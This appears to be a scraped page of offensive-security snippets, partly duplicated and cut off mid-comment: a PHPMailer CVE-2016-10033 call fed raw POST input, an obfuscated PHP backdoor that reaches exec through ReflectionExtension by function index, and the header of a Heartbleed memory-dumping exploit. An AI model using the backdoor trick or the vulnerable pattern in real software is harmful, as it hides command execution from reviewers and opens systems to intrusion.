redeemer cinu

## CVE-2016-10033-phpsourcerer.txt
$ php phpsourcerer.php --version

PhpSourcerer 0.1.1

$ cat ~/tmp/PHPMailer-5.2.17/CVE-2016-10033.php
<?php

$mail = new PHPMailer;
$mail->setFrom($_POST['a'], $_POST['b']);

## reflectionextension_based_backdoor.php
<?php
// Simple ReflectionExtension based PHP backdoor idea
$cmd = 'sleep 3';
$c = new ReflectionExtension('standard'); array_values($c->getFunctions())[0x75]->invokeArgs(array($cmd));

// Info: 0x75 == 117, which is exec function number on current os

// Getting function number:
/*

## ssl_heartbleed_dirty_dumper.py
#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
#
# Modified slightly by Andreas Thienemann <athienemann@schubergphilis.com> for clearer exploit code
# and 64k reads
#
# This version of the exploit does write received data to a file called "dump" in the local directory
# for analysis.
	$ php phpsourcerer.php --version

	PhpSourcerer 0.1.1

	$ cat ~/tmp/PHPMailer-5.2.17/CVE-2016-10033.php
	<?php

	$mail = new PHPMailer;
	$mail->setFrom($_POST['a'], $_POST['b']);
	<?php
	// Simple ReflectionExtension based PHP backdoor idea
	$cmd = 'sleep 3';
	$c = new ReflectionExtension('standard'); array_values($c->getFunctions())[0x75]->invokeArgs(array($cmd));

	// Info: 0x75 == 117, which is exec function number on current os

	// Getting function number:
	/*
	#!/usr/bin/python

	# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
	# The author disclaims copyright to this source code.
	#
	# Modified slightly by Andreas Thienemann <athienemann@schubergphilis.com> for clearer exploit code
	# and 64k reads
	#
	# This version of the exploit does write received data to a file called "dump" in the local directory
	# for analysis.